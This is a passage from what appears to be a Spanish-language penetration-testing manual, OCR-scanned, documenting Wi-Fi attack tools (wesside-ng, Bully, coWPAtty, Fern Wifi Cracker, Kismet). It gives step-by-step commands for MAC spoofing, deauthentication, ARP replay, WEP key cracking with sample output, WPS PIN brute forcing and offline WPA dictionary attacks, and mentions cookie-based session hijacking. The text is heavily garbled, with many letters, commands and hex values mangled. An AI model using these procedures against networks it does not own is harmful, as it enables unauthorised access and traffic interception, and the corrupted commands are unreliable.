-t <threshold> 

Para cada número de IV especificados, reinicie el motor 
airecrack-ng PTW. (Opcional) 

-f <max ehan> 

El canal escaneado más alto. Predeterminado: 11 

-k <txnum> 

Ignora los ACK ya que algunas tarjetas / controladores no 
los informan. Por lo tanto retransmitirá automáticamente X 
veces. Es decir, -k 1 transmitirá una vez y asumirá que el 
paquete llega alli. -k 2 se retransmitirá 2 veces y asi 
sucesivamente. Cuanto mayor sea el valor -k, la velocidad 
de transmisión más lenta se deberá a las muchas 
retransmisiones. (Opcional) 


Cuando se ejecuta wesside-ng, se crean 3 arehivos automáticamente en el direetorio aetual: 

• wep.cap - El archivo de eaptura de paquetes. Contiene el paquete eompleto, no solo los IV. 

• prga.log: contiene el PRCA obtenido a través del ataque de fragmentaeión. 

• key.log: contiene la clave WEP euando se encuentra. 

16.3. Ejemplo 

Asegurarse de que airmon-ng ha puesto la tarjeta en modo monitor. 

Ejeeutar: 

wesside-ng -i wlanO 

donde -i wlanO es la interfaz inalámbrica. 

El programa responde: 

[13:51:32] Using mac 00:C0:CA:17:DB:6A 
[13:51:32] Eooking for a vietim... 

[13:51:32] Eound SSID(teddy) BSS=(00:14:6C:7E:40:80) ehan=9 
[13:51:32] Authentieated 
[13:51:32] Assoeiated (ID=5) 

[13:51:37] Got ARP request from (00:D0:CP:03:34:8C) 

[13:51:37] Datalen 54 Known elear 22 




[13:51:37] Got 22 bytes of prga lV=(0e:4e:02) PRGA=A5 DC C3 AF 43 34 17 OD OD 7E 2AC1 
44 8A DA 51 A4 DF BB C6 4F 3C 

[13:51:37] Got 102 bytes ofprga lV=(0f:4e:02) PRGA=17 03 74 98 9F CC FB AAAl B3 5B 00 
53 EC 8E C3 BB E7 56 21 09 95 12 70 24 8C CO 16 40 9EA8 BD BAC4 CC 18 04 Al 41 47 B3 
22 8B D2 42 DC 71 54 CE AD EE DO C3 15 7E EB DI E2 BB 69 7E 11 8A99 40 EC 75 EC 12 BE 
3B C8 2A32 88 8ADC E8 35 7C EE DAA3 E3 6B OC 45 21 DC BD 23 59 28 85 24 49 18 49 IC 
24 6D E2 

[13:51:37] Got 342 bytes ofprga lV=(10:4e:02) PRGA=5C EC 18 24 E3 21 B2 74 2A 86 97 C7 4C 
22 EC 42 00 3A C6 07 OC 02 AA D6 B6 D8 EE B1 16 E8 40 31 B7 95 3B E8 IB BD 94 8B 3B 7A 
98 DE C6 72 ED E8 A5 EC E7 81 AO 9E 01 76 44 57 C4 EB AE D7 AB EB 2E 40 C8 E5 5E EE 13 
DB E4 E7 E2 91 D9 36 77 C1 EO 9C E4 8C BA E9 50 CO BO E7 23 75 85 41 82 54 E5 22 3C A9 45 
OC lE AE DA 3B E7 AA 41 30 23 63 97 B1 42 4C A8 OE CO 5A 7E A2 58 C2 02 B8 7E DB C7 CC 
66 4D 86 53 30E0A0 81 52 13 14 08 5E 45 C5 AC21 C3 90 86 Al 8D 45 CC 7CA2E2 95 34 EE 
38 59 EA21 OE CC 63 81 05 26 8D B8 84 Al D3 DE 5D EO CA23 52 85 4E 61 5B E3 83 4B 2A 
10 OA 14 94 EA 90 D4 EC 3E 7B CD A9 C3 E3 4D B7 99 BD 21 D4 EC DB 60 OC 92 8D 76 87 EE 
E7 45 C6 D7 OB 96 A4 18 41 63 48 79 EO 4E 3A 9E IB 8D 17 E5 BO EE 30 E3 27 55 El EA 8A 60 
EA 9E CB CE D9 ID EE 94 20 20 EB 58 E8 55 38 4E C9 E7 53 55 94 6C 6A 6D EO D5 4E DB 78 
D6 52 A3 34 68 2C 8B 7A EA C8 DA 3B D9 CB 4C 65 E6 CE B8 EE CD 58 DD C1 C8 E8 08 IB 
27 EC 74 7E AD AO OE lE 85 79 E4 CO 54 D9 99 51 CA 96 02 73 93 33 6E E6 D5 El 55 81 2B AA 
C4 3AB2 0AC6 04 EE 
[13:51:39] Guessing PRGA8e (IPbyte=230) 

[13:51:39] Got clear-text byte: 192 
[13:51:40] Guessing PRGA be (lPbyte=198) 

[13:51:40] Got clear-text byte: 168 
[13:51:40] Guessing PRGA 8d (IP byte=47) 

[13:51:40] Got clear-text byte: 1 
[13:51:40] Guessing PRGA 12 (lPbyte=240) 

[13:51:40] Got clear-text byte: 200 
[13:51:40] Got 1P=(192.168.1.200) 

[13:51:40] My IP=(192.168.1.123) 

[13:51:40] Sending arp request for: 192.168.1.200 
[13:51:40] Got arp reply from (00:D0:CP:03:34:8C) 

[13:52:25] WEP=000009991 (next crack at 10000) 1V=60:62:02 (rate=115) 

[13:52:36] WEP=000012839 (next crack at 20000) 1V=21:68:02 (rate=204) 

[13:52:25] Starting crack P1D=2413 

[13:52:27] WEP=000010324 (next crack at 20000) lV=0d:63:02 (rate=183) 

[13:54:03] Starting crack P1D=2415 

[13:53:28] WEP=000023769 (next crack at 30000) 1V=79:32:00 (rate=252) 

[13:53:11] Starting crack P1D=2414 

[13:53:13] WEP=000020320 (next crack at 30000) lV=7d:2b:00 (rate=158) 

[13:54:21] WEP=000034005 (next crack at 40000) 1V=53:47:00 (rate=244) 


[328385:55:08] Tested 5/70000 keys 
KB depth byte(vote) 

0 0/ 1 01( 206) 3B( 198) 5P( 190) 77( 188) 3D( 187) D2( 187) 60( 186) 6P( 186) Al( 185) 

48(184) 

1 0/ 1 23( 232) 82( 190) BP( 187) 4E( 184) 0D( 183) 90( 181) B9( 181) 08( 180) 1A( 180) 8A( 
180) 

2 0/ 1 45(200)P0( 186)52( 184)AE( 184) 75( 183)48( 181)A1( 180)71( 179)DE( 179) 

21( 178) 

3 0/ 1 67( 221) AE( 202) B2( 193) 14( 191) 51( 184) 6D( 184) 64( 183) 65( 183) 5B( 182) 

17(181) 



4 0/ 5 89( 182)DB( 182) 74( 181)C2( 181)CC( 181)64( 180)CD( 180)5F( 179)A6( 179) 
1A( 178) 


Key: 01:23:45:67:89 

[13:54:51] WEP=000040387 (next crack at 50000) lV=0d:a0:02 (rate=180) 

[13:55:08] WEP=000043621 (next crack at 50000) lV=da:5a:00 (rate=136) 

[13:55:08] Stopping crack P1D=2416 
[13:55:08] KEY=(01:23:45:67:89) 

Owned in 3.60 minutes 

[13:55:08] Dying... 

16.4. Uso de la opción -k 

Algunas tarjetas/controladores no informan correetamente los ACK. Ea opeión "-k" permite ignorar 
los ACK y obliga a wesside-ng a retransmitir los paquetes la cantidad de veces espeeificada. Por lo 
tanto retransmitirá automáticamente X veces. Es deeir, -k 1 transmitirá una vez y asumirá que el 
paquete llega alli. -k 2 se retransmitirá 2 veces y asi sueesivamente. 

Algunos casos específicos: 

• Si obtiene un error de retransmisión MAX, intentar -k 1. 

• Si tiene una eonexión deficiente, intentar -k 3. 

16.5. Ejemplo 

Para iniciar una monitorización, se debe poner la interfaz en modo monitor y para ello ejeeutar el 
comando airmon-ng wifiO donde wifiO es el nombre de la interfaz. Para pararlo, se debe ejecutar el 
comando airmon-ng stop wifiO. 

También ejecutar airmon-ng check wifiO para verificar si hay algún proceso que pueda interferir. 

Otra forma de hacerlo es ejeeutando los eomandos 
ifconfig wifiO down 
iwconfig wifiO mode monitor 
ifeonfig wifiO up 

A continuación cambiar la MAC con el comando macchanger - -mac 00:11:22:33:44:66 wifiO 

Para ver las redes wifi, ejeeutar el comando airodump-ng wifiO y pararlo con Ctrl + C. 

Para atacar una red debemos ejeeutar el comando airodump-ng -c (channel) -w (file ñame), 
reemplazando (channel) con el valor de CH, (file ñame) con cualquier nombre, (bssid) eon el 
BSSID de la red a ataear. 

Ahora se debe abrir tra ventana y ejecutar el comando 
aireplay-ng -0 0 -a (bssid) -h 00:11:22:33:44:66 wifiO 
donde -0 indica el ataque de deautenticaeión 

Al eabo de un cierto tiempo una vez parado el airepaly-ng, en la ventana de airodump, apareeerá la 
deteeción de un WPA handshake. 

Ejeeutar el comando aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifiO 

Si no se ve ARP ACK y los paquetes enviados no aumentan o todavia 0 que significa que nadie está 
aecediendo a esta red. 



Ejecutar el comando aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF 
y seguir intentando hasta que se consiga el éxito obtuvo un paso opcional 
konsole -b (bssid) -h 00; 11: 22: 33: 44: 66 wfiO 

Presionar enter. Ahora se verá que los paquetes ARP y ACK en la segunda consola están 
aumentando rápidamente Mantenga esta consola como está y comience la 4“ consola. 

Ejecutar el comando aircrack-ng -b (bssid) (filename)- 

Esperar y vigilar.Backtrack hará el resto. Ha conseguido la clave. 




17. Bully 


Bully es una nueva implementaeión del ataque de fuerza bruta WPS eserito en C. Es 
eonceptualmente idéntieo a otros programas, ya que explota el defecto de diseño en la 
especificación WPS. Tiene varias ventajas sobre el código reaver original en cuanto incluye menos 
dependencias, memoria mejorada y rendimiento de la CPU, manejo correcto del endianness y un 
conjunto de opciones más sólido. Se ejecuta en Linux y se desarrolló específicamente para 
ejecutarse en sistemas Linux integrados (OpenWrt, etc.) independientemente de la arquitectura. 

uso: bully <opciones> interface 

Argumentos: 

interface : Interfaz inalámbrica en modo monitor (se requiere root) 

-b, —bssid macaddr : Dirección MAC del punto de acceso objetivo 
-e, —essid string : SSID extendido para el punto de acceso 

Argumentos opcionales: 


-c, —channelN[,N...] 

Número de canal de AP o lista a saltar 

-i, —Índex N 

índice de pin inicial (7 u 8 dígitos). 

Por defecto automático. 

-1, —lockwait N 

Segundos para esperar si el AP bloquea WPS. 

Por defecto 43 

- 0 , —outfde fde 

Archivo de salida para mensajes. Predeterminado stdout 

-p, —pin N 

Número de pin inicial (7 u 8 dígitos). 

Por defecto automático. 

-s, —source macaddr 

Dirección MAC origen 

-V, — verbosity N 

Nivel de verbosidad 1-3, 1 es el más quieto. Por defecto 3 

-w, —workdir path 

Ubicación de archivos pin/sesión [~ / .bully /] 

-5, —5ghz 

Sube a la lista de canales predeterminados de 5 GHz. Por 
defecto no. 

-B, —bruteforce 

Bruteforce el dígito de suma de comprobación de WPS. 

Por defecto no. 

-L, —forcé 

La fuerza continúa a pesar de las advertencias. 

Por defecto no. 

-S, —sequential 

Pines secuenciales . Por defecto aleatorizar 

-T, —test 

Modo de prueba. No inyecta ningún paquete. 


Argumentos avanzados: 


-a, —acktime N 

En desuso/ignorado 

-r, —retries N 

Reenvíe los paquetes N veces cuando no se haya 
recibido. Por defecto 2 

-m, —ml3time N 

En desuso/ignorado 

-t, —timeout N 

En desuso/ignorado 





-1, —pinldelay M,N 

Retrasar M segundos eada N “ naek en M5. 

Por defeeto 0,1 

-2, —pm2delay M,N 

Retrasa M segundos eada N “ naek en M7 

Por defeeto 5,1 

-A, —noaeks 

Deshabilitar la eomprobaeión de ACK para los 
paquetes enviados 

-C, —noeheek 

Saltar la validaeión CRC/ECS 

-D, —deteetloek 

Deteetar bloqueos de WPS no reportados por AP 

-E, —eapfail 

Pallo EAP terminar eada intereambio 

-E, —loekignore 

Ignorar los bloqueos WPS reportados por el AP 

-M, —m57naok 

Tiempos de espera M5/M7 tratados eomo 
WSCNACK 

-N, —nofes 

Eos paquetes no eontienen el eampo PCS. 

Por defeeto automátieo 

-P, —probe 

Utiliee la solieitud de la sonda para el AP de 
nonbeaeoning 

-R, —radiotap 

Supongamos que los eneabezados radiotap están 
presentes. Por defeeto automátieo 

-W, —windows7 

Masquerade eomo registrador de Windows 7 

-Z, —suppress 

Suprimir el algoritmo de aeeleraeión de paquetes 

-V, —versión 

Imprimir la versión y salir 

-h, —help 

Mostrar la ayuda 


Ejemplo 

Con el programa wash, podemos ver las BSSID que no tienen bloqueado WPS. A oontinuaeión 
ejeeutar 

bully —bssid xxxx -o eanal -B -p 12345670 —foree wlanOmon 


donde la bssid es una de las que no tiene bloqueado WPS. 




18. coWPAtty 


Se trata de una implementaeión de un ataque de diccionario sin conexión contra redes WPA/WPA2 
mediante autenticación basada en PSK. Muchas redes empresariales implementan mecanismos de 
autenticación basados en PSK para WPAAVPA2, ya que es mucho más fácil que establecer la 
arquitectura de RADIUS, supplicant y autoridad de certificación necesaria para la autenticación 
WPA-Enterprise. cowpatty puede implementar un ataque acelerado si hay un archivo PMK 
precalculado disponible para el SSID que se está evaluando. 

Uso: cowpatty [opciones] 

Opciones 


-f 

Archivo de diccionario 

-d 

Archivo hash generado por el programa genpmk 

-r 

Archivo de captura de paquetes 

-s 

Red SSID. Incluir comillas si SSID incluye espacios 

-c 

Comprobar si hay paquetes válidos de handshake 

-h 

Visualizar la ayuda y salir 

-V 

Modo verbose 

-V 

Visualizar la versión del programa y salir. 


genpmk - ataque de precomputación WPA-PSK 
Uso: genpmk [opciones] 

Opciones 


-f 

Archivo de diccionario 

-d 

Archivo hash de salida 

-s 

SSID de la red 

-h 

Visualizar la ayuda y salir 

-V 

Modo verbose 

V 

Visualizar la versión del programa y salir. 


El proceso a seguir es 

1. Ejecutar airmon-ng start wlanO 

2. Ejecutar airodump-ng —bssid XX.XX.XX.XX:XX:XX -c 9 -w cowpatty monO 

3. Ejecutar cowpatty -f /pentest/passwords/wordlists/darkcode.lst -r /root/cowcrack-Ol.cap -s 
<essid> 


Ejemplos 

Probar de usar el segundo handshake cuya contraseña es preinstall y con diccionario: 
cowpatty -r prueba2.cap -f prueba.txt -s ‘Virgin broadband” 


Creando diccionario precomputado para el essid 'Virgin broadband' 
genpmk -f prueba.txt -d salida_precom -s “virgin broadband” 





19. Fern Wifi Cracker 


Fern Wifi Cracker es un programa de software de ataque y de auditoría de seguridad de redes 
inalámbrieas eserito eon el lenguaje de programaeión Python y la biblioteea GUI de Python Qt. El 
programa es eapaz de descifrar y recuperar elaves WEP/WPA/WPS y también ejecutar otros ataques 
basados en las redes inalámbrieas o basadas en Ethernet. 

Eern Wifi Craeker aetualmente soporta las siguientes earaeterístieas: 

• WEP Cracking con fragmentación, Chop-Chop, Caffe-Eatte, Hirte, Repetición de solieitud 
ARP o ataque WPS 

• WPAAVPA2 Craeking con ataques basados en diccionario o WPS 

• Guardado automático de la elave en la base de datos en erack exitoso 

• Sistema automátieo de ataque al punto de aeeeso 

• Seeuestro de sesión (Modos pasivo y Ethernet) 

• Seguimiento de ubieaeión geográfiea de la direeeión MAC del punto de aeeeso 

• Motor MitM interno 

• Ataques de fuerza bruta (HTTP, HTTPS, TEENET, FTP) 

• Soporte de actualizaeión 


Utiliza el modo gráfieo en lugar de tener que usar la línea de eomandos. Para ello seguir los pasos 
siguientes: 

1. El primer paso es seleeeionar la interfaz. Haeer elie en el menú desplegable Select Interfaee. 
En este caso, seleccionar wlanO. Eem Wifi Cracker eoloeará automátieamente la interfaz en 
modo monitor. 

2. A eontinuaeión haeer elie en el botón Sean for Aeeess Points. Eern Wifi Craeker eseaneará 
automátieamente las redes inalámbrieas dentro del alcanee de su antena. Después de que la 
exploración es eompleta, los botones WiEi WEP y WiPi WPA eambiarán de eolor gris a 
eolor, indieando puntos de aeeeso inalámbrieos que utilizan estas eonfiguraeiones de 
seguridad y que han sido deteetados. 

3. Al haeer che en el botón Wifi WPA se muestra un panel de ataque, que eontiene una 
representaeión gráfiea de los puntos de aeeeso inalámbrieos WPA que se pueden ataear. 

4. Esta pantalla proporeiona detalles sobre el punto de aeeeso seleeeionado. Cuando se 
seleeciona una red, nos muestra su ESSIS, BSSID, eanal, potencia, tipo de eneriptaeión y si 
soposrta o no WPS. También aquí podemos optar por un ataue regular o un ataque WPS. 

5. El otro paso neeesario es establecer el arehivo de código de aeeeso que Eern Wifi Cracker 
utilizará para revertir el eódigo de aeeeso. En Kali Einux hay alguna word list de 
/home/wordlist/. También se puede emplear cualquiera que se haya bajado el usuario. 

6. Una vez que el arehivo de eontraseña esté eonfigurado, haeer che en el botón Wifi Attaek. 
Eern Wifi Cracker completa todo el proeeso y esto ineluye anular la autenticación de un 
eliente y luego eapturar el handshake. Einalmente Eern Wifi Craeker se moverá a través del 
fiehero de eódigo de aeeeso y si el eódigo de aeeeso está en ese arehivo, apareee la pantalla 
siguiente: 




Fern Cookie Hijacker es una herramienta de secuestro de sesión basada en Wifi capaz de clonar 
sesiones web remotas en linea olfateando y capturando paquetes de cookies inalámbricos de 
dispositivos remotos al interceptar señales inalámbricas accesibles 



20. Kismet 


Kismet es un detector de red inalámbrica 802.11 nivel 2, escaneador y un sistema de detección de 
intrusos. Funcionará con cualquier tarjeta inalámbrica que admita el modo monitor y pueda detectar 
tráfico 802.11a /b/g/n. Puede usar otros programas para reproducir alarmas de audio para eventos de 
red, leer resúmenes de red o proporcionar coordenadas de GPS. Este es el paquete principal que 
contiene el núcleo, el cliente y el servidor. 

Uso 

kismet [server-options] [—] [client-options] 

kismet_server [-nqs] [-ttitle] [-f config-file] [-c capture-source][-C enable-capture-sources] 

[-1 log-types] [-d dump-type][-m max-packets-per-file] [-g gpshost:port] [-p listen-port] 

[-a allowed-hosts] [-N server-name] 

kismet_client [-qr] [-f config-file] [-s serverhost:port] [-g gui-type] [-c display-columns] 

Opciones 


-V, —versión 

Mostrar la versión 

-f, —config-file <file> 

Usar un archivo de configuración alternativo 

—no-line-wrap 

Activar linewrapping de salida 

-s, —silent 

Desactivar la salida estándar 

—daemonize 

Modo daemon 

—no-plugins 

No cargar plugins 

—no-root 

No iniciar el binario kismet capture cuando no se esté 
ejecutando como root. 

-1, -server-listen 

Anular las opciones de escucha del servidor Kismet 

—drone-listen 

Anular las opciones de escucha de Kismet Drone 

-T, —log-types <types> 

Anular los tipos de registro activados 

-t, —log-title <title> 

Anular el titulo de registro predeterminado 

-p, —log-prefix <prefix> 

Directorio para almacenar archivos de registro 

-n, -no-logging 

Deshabilitar el registro por completo 

-c, —capture-source 

Especificar una nueva fúente de captura de paquetes 

-C, —enable-capture-sources 

Habilitar fuentes de captura. Se trata de una lista de 
nombres o interfaces separados por comas 

—filter-tracker 

Activar el filtrado de rastreador 

—use-gpsd-gps (h:p) 

Usar el GPS controlado por GPSD en el host:port. 
Predeterminado: localhost: 2947 

—use-nmea-gps (dev) 

Usar GPS serie local NMEA en el dispositivo 
Predeterminado: /dev/ttyUSBO 

—use-virtual-gps (lat,lon,alt) 

Utilizar un registro virtual de GPS de posición fija. 

—gps-modelock <t:f> 

Eorzar unidades GPS rotas para que actúen como si 
tuvieran una señal válida (verdadero / falso) 




—gps-reconnect <t:f> 


Reconectar si falla un dispositivo GPS (verdadero / falso) 


kismet maneja automáticamente el inicio de kismet server y kismet client. 

kismet se instala como suid-root de forma predeterminada. Caerá privs en el usuario especificado en 
kismet. conf inmediatamente después de enlazar y configurar la fuente de captura. 

KISMET_SERVER 

kismet_server captura, disecciona y registra paquetes y datos de GPS. Es capaz de funcionar en 
modo 'headless' sin pantalla. Múltiples clientes en varias computadoras se puede conectar a un solo 
servidor. 

Opciones 


-I 

Establecer el canal inicial para una fuente de canal (fuente: canal) 

-X 

Habilitar por la fuerza el contenedor del canal 

-X 

Deshabilitar por la fuerza el contenedor del canal 

-t 

Establece el título utilizado para el campo% t de la plantilla de archivo de 
registro (Predeterminado: Kismet) 

-n 

Deshabilitar todo el registro 

-f 

Usar un archivo de configuración alternativo 

-c 

Anula las líneas de captura (tipo, interfaz, nombre) de la fuente. Las opciones 
múltiples de captura de origen para múltiples fuentes. Todas las fuentes 
proporcionadas aquí se habilitan automáticamente a menos que también se 
proporcione una lista de disponibles 

-C 

Lista separada por comas para anular que fuentes de captura están habilitadas. 

-I 

Anular tipos de registro, separados por comas (dump, cisco, débil, csv, xml, 

gps) 

-m 

Reemplazar los paquetes máximos registrados por archivo 

-q 

Anular la opción de sonido y ejecutar en modo silencioso 

-g 

Anular host:port del GPS 

-p 

Anular puerto para escuchar a los clientes 

-a 

Lista de anulación de IP clientes o bloques de red/máscara separados por 
comas permitidos para conectarse 

-s 

Ejecutar en modo silencioso 

-N 

Reemplazar el nombre del servidor para esta instancia de Kismet 

-v 

Mostrar la versión 

-h 

Visualizar la ayuda 


KISMET_CLIENT 

kismet_client es una interfaz ncurses y paneles que se conecta al servidor y muestra las redes 
detectadas, estadísticas, detalles de red, etc. 

Opciones 


-f 

Usar un archivo de configuración alternativo 

-u 

Usar un archivo de configuración de lU alternativo 

-q 

Anular la opción de sonido y ejecutar en modo silencioso 

-s 

Anular host:port del servidor 

-r 

Intenta restablecer automáticamente la conexión si el servidor termina 

-g 

Anular tipo de lU (curses, panel) 

-c 

Anula la lista de columnas a mostrar separadas por comas 






-V 

Mostrar la versión 

-h 

Visualizar la ayuda 


GPSMAP 

gpsmap lee los archivos de datos GPS y de red XML y traza redes en los mapas cargados o 
imágenes proporcionadas por el usuario como fotos satelitales. 


20.1. Ejecución 

Kismet se inicia con un usuario root y el arranca de un servidor, al cual pueden acceder varios 
clientes kismet. A continuación se muestra la Consolé Windows donde se visualiza las redes wifi 
que detecta. Cuando se cierra esta ventana, se muestra la ventana mostrada a continuación. 

Esta es la ventana principal y en cada linea se muestra una red wifi con todas sus características. En 
la parte superior se muestran 4 opciones: Kismet, Sort, View y Windows. 

En la pestaña Kismet hay las opciones siguientes: 

• Start Server (S). Arrancar el servidor 

• Server Consolé (c). Ir a la cónsola inicial. 

• Connect ©. Conectar al servidor. 

• Disconnect (D). Desconectar el servidor. 

• Add Source (A). Añadir una fuente. 

• Config Channel (E). Configurar el canal. 

• Plugins. Seleccionar un plugin. 

• Preferences. Son: Audio, Colors, Client Columns, Client Extras, GPS, Info Pane, Network 
Columns, Network Extras, Servers, Starup & Shutdown, Warnings 

• Quit (Q) 

También se puede interactuar con el programa para obtener más detalles de una red en particular, 
por lo que primero es sacar la ventana de redes del modo Autofit, modo que está en la pestaña Sort 
y que hace que vayan apareciendo las redes según va detectando el tráfico en las mismas y ordenar 
las redes según nuestros deseos con las demás opciones que son: 

• Auto-fit (a) 

• Type (t) 

• Channel (c) 

• Encription (e) 

• First Seen (descending) (F) 

• Last Seen (1) 

• Last Seen (descending) (L) 

• BSSID (b) 

• SSID (s) 

• Signal(S) 

• Packets (p) 

• Packets (descending) (P) 

En la pestaña View, las opciones son: 

• NetWork List (n) 

• Client List (c) 

• GPS Data (g) 






• Battery (b) 

• General Info (S) 

• Status (s) 

• Packet Graph (p) 

• Source Info © 

En la pestaña Windows las opciones son: 

• NetWork Details (d) 

• Glient List (1) 

• NetWork Note (N) 

• Ghannel Details (c) 

• GPS Details (g) 

• Alerts (a) 

20.2. Ajustes básicos de configuración 

El fichero de configuración kismet.conf consta de 

# Kismet config file 

# Most of the "static" configs have been moved to here — the command line 

# config was getting way too crowded and cryptic. We want functionality, 

# not continually reading —help! 

# Versión of Kismet config 
version=2009-newcore 

# Ñame of server (Purely for organizational purposes) 

# If commented out, defaults to host ñame of system 

# servername=Kismet Server 

# Prefix of where we log (as used in the logtemplate later) 

# logprefix=/some/path/to/logs 

# Do we process the contents of data frames? If this is enabled, data 

# frames will be truncated to the headers only immediately after frame type 

# detection. This will disable IP detection, etc, however it is likely 

# safer (and definitely more polite) if monitoring networks yon do not own. 

# hidedata=true 

# Do we allow plugins to be used? This will load plugins from the system 

# and user plugin directiories when set to true (See the README for the default 

# plugin locations). 
allowplugins=true 

# See the README for full information on the new source format 

# ncsource=interface:options 

# for example: 

# ncsource=wlanO 

# ncsource=wifiO:type=madwifi 

# ncsource=wlanO:name=intel,hop=false,channel=ll 

# Gomma-separated list of sources to enable. This is only needed if you defined 

# múltiple sources and only want to enable some of them. By default, all defined 




# sources are enabled. 

# For example, if sources with name=prismsource and name=ciscosource are defined, 

# and you only want to enable those two: 

# enablesources=prismsource, ciscosource 

# Control which channels we like to spend more time on. By default, the list 

# of channels is pulled from the driver automatically. By setting preferred channels, 

# if they are present in the channel list, they'll be set with a timing delay so that 

# more time is spent on them. Since 1, 6, 11 are the common default channels, it makes 

# sense to spend more time monitoring them. 

# For finer control, see further down in the config for the channellist= directives. 
preferredchannels=l,6,ll 

# How many channels per second do we hop? (1-10) 
channel velo city=3 

# By setting the dwell time for channel hopping we override the channelvelocity 

# setting above and dwell on each channel for the given number of seconds. 
#channeldwell=10 

# Channels are defined as: 

# channellist=name:chl,ch2,ch3 

# or 

# channellist=name:range-start-end-width-offset,ch,range,ch,... 

# 

# Channels may be a numeric channel or a frequency 

# 

# Channels may specify an additional wait period. For common default channels, 

# an additional wait period can be useful. Wait periods delay for that number 

# of times per second - so a configuration hopping 10 times per second with a 

# channel of 6:3 would delay 3/lOths of a second on channel 6. 

# 

# Channel lists may have up to 256 channels and ranges (combined). For power 

# users scanning more than 256 channels with a single card, ranges must be used. 

# 

# Ranges are meant for "power users" who wish to define a very large number of 

# channels. A range may specify channels or frequencies, and will automatically 

# sort themselves to cover channels in a non-overlapping fashion. An example 

# range for the normal 802.11b/g spectrum would be: 

# 

# range-1-11-3-1 

# 

# which indicates starting at 1, ending at 11, a channel width of 3 channels, 

# incrementing by one. A frequency based definition would be: 

# 

# range-2412-2462-22-5 

# 

# since llg channels are 22 mhz wide and 5 mhz apart. 

# 

# Ranges have the flaw that they cannot be shared between sources in a non-overlapping 

# way, so múltiple sources using the same range may hop in lockstep with each other 

# and duplícate the coverage. 



# 

# channellist=demo:l:3,6:3,ll:3,range-5000-6000-20-10 

# Default channel lists 

# These channel lists MUST BE PRESENT for Kismet to work properly. While it is 

# possible to change these, it is not recommended. These are used when the supported 

# channel list can not be found for the source; to forcé using these instead of 

# the detected supported channels, override with channellist= in the source defintion 

# 

# IN GENERAL, if yon think yon want to modify these, what yon REALLY want to do is 

# copy them and use channellist= in the packet source. 
channellist=IEEE80211b:l:3,6:3,ll:3,2,7,3,8,4,9,5,10 
channellist=IEEE80211a:36,40,44,48,52,56,60,64,149,153,157,161,165 

channellist=IEEE80211ab:l:3,6:3,ll:3,2,7,3,8,4,9,5,10,36,40,44,48,52,56,60,64,149,153,157,161,l 

65 

# Client/server listen config 
listen=tcp://127.0.0.1:2501 

# People allowed to connect, comma seperated IP addresses or network/mask 

# blocks. Netmasks can be expressed as dotted quad (/255.255.255.0) or as 

# numbers (/24) 
allowedhosts=127.0.0.1 

# Máximum number of concurrent GUI's 
maxclients=5 

# Máximum backlog before we start throwing out or killing clients. The 

# bigger this number, the more memory and the more power it will use. 
maxbacklog=5000 

# Server + Drone config options. To have a Kismet server export live packets 

# as if it were a drone, uncomment these. 

# dronelisten=tcp://l27.0.0.1:3501 

# droneallowedhosts=127.0.0.1 

# dronemaxclients=5 

# droneringlen=65535 

# GUI file, expected formal 00:ll:22<tab>manufname 

# IEEE OUI file used to look up manufacturer info. We default to the 

# wireshark one since most people have that. 
ouifile=/etc/manuf 

ouifile=/usr/share/wireshark/wireshark/manuf 

ouifile=/usr/share/wireshark/manuf 

ouifile=/ApplicationsAYireshark.app/Gontents/Resources/share/wireshark/manuf 

# Do we have a GPS? 
gps=true 

# Do we use a locally serial attached GPS, or use a gpsd server, or 

# use a ñxed virtual gps? 

# (Pick only one) 
gpstype=gpsd 

# Host:port that GPSD is running on. This can be localhost OR remóte! 
gpshost=localhost:2947 



# gpstype=serial 

# What serial device do we look for the GPS on? 

# gpsdevice=/dev/rfcommO 

# gpstype=virtual 

# gpsposition=100,-50 

# gpsaltitude=1234 

# Do we lock the mode? This overrides coordinates of lock "0", which will 

# generate some bad information until you get a GPS lock, but it will 

# fix problems with GPS units with broken NMEA that report lock 0 
gpsmodelock=false 

# Do we try to reconnect if we lose our link to the GPS, or do we just 

# let it die and be disabled? 
gpsreconnect=true 

# Do we export packets over tun/tap virtual interfaces? 
tuntap_export=false 

# What virtual interface do we use 
tuntap_device=kistapO 

# Packet filtering options: 

# filter_tracker - Packets filtered from the tracker are not processed or 

# recorded in any way. 

# filter_export - Gontrols what packets influence the exported GSV, network, 

# xml, gps, etc files. 

# All filtering options take arguments containing the type of address and 

# addresses to be filtered. Valid address types are ANY', 'BSSID', 

# 'SOURGE', and 'DEST'. Eiltering can be inverted by the use of'!' before 

# the address. Eor example, 

#filter_tracker=ANY(!"00:00:DE:AD:BE:EE") 

# has the same effect as the previous mac_filter config file option. 

# filter_tracker=... 

# filter_dump=... 

# filter_export=... 

# filter_netclient=... 

# Alerts to be reported and the throttling rates. 

# alert=name,throttle/unit,burst 

# The throttle/unit describes the number of alerts of this type that are 

# sent per time unit. Valid time units are second, minute, hour, and day. 

# Burst describes the number of alerts sent before throttling takes place. 

# Eor example: 

# alert=EOO,10/min,5 

# Would allow 5 alerts through before throttling is enabled, and will then 

# limit the number of alerts to 10 per minute. 

# A throttle rate of 0 disables throttling of the alert. 

# See the README for a list of alert types. 
alert=ADHOGGONELIGT,5/min,l/sec 
alert=AIRJAGKS SID, 5/min, 1/sec 
alert=APSPOOE, 10/min, 1/sec 
alert=BGASTDISGON,5/min,2/sec 



alert=BSSTIMESTAMP,5/min,l/sec 
alert=CHANCHANGE,5/min,l/sec 
alert=CRYPTODROP, 5/min, 1/sec 
alert=DISASSOCTRAPPIC,10/min,l/sec 
alert=DEAUTHPLOOD,5/min,2/sec 
alert=DEAUTHCODEINVALID, 5/min, 1/sec 
aiert=DISCONCODEINVALID,5/min,l/sec 
aiert=DHCPNAMECHANGE,5/min,l/sec 
aiert=DHGPOSGHANGE,5/min, 1/sec 
aiert=DHGPGLIENTID,5/min,l/sec 
aiert=DHGPGONPLIGT,10/min, 1/sec 
aiert=NETSTUMBLER,5/min,l/sec 
aiert=LUGENTTEST,5/min,l/sec 
aiert=LONGSSID,5/min, 1/sec 
aiert=MSPBGOMSSID,5/min, 1/sec 
aiert=MSPDLINKRATE, 5/min, 1/sec 
aiert=MSPNETGEARBEAGON,5/min,l/sec 
aiert=NULLPROBERESP, 5/min, 1/sec 
#aiert=PROBENO JOIN, 5/min, 1/sec 

# Gontrois behavior of the APSPOOE aiert. SSID may be a iiterai match (ssid=) or 

# a regex (ssidregex=) if PGRE was avaiiabie when kismet was buiit. The aiiowed 

# MAG iist must be comma-separated and enciosed in quotes if there are muitipie 

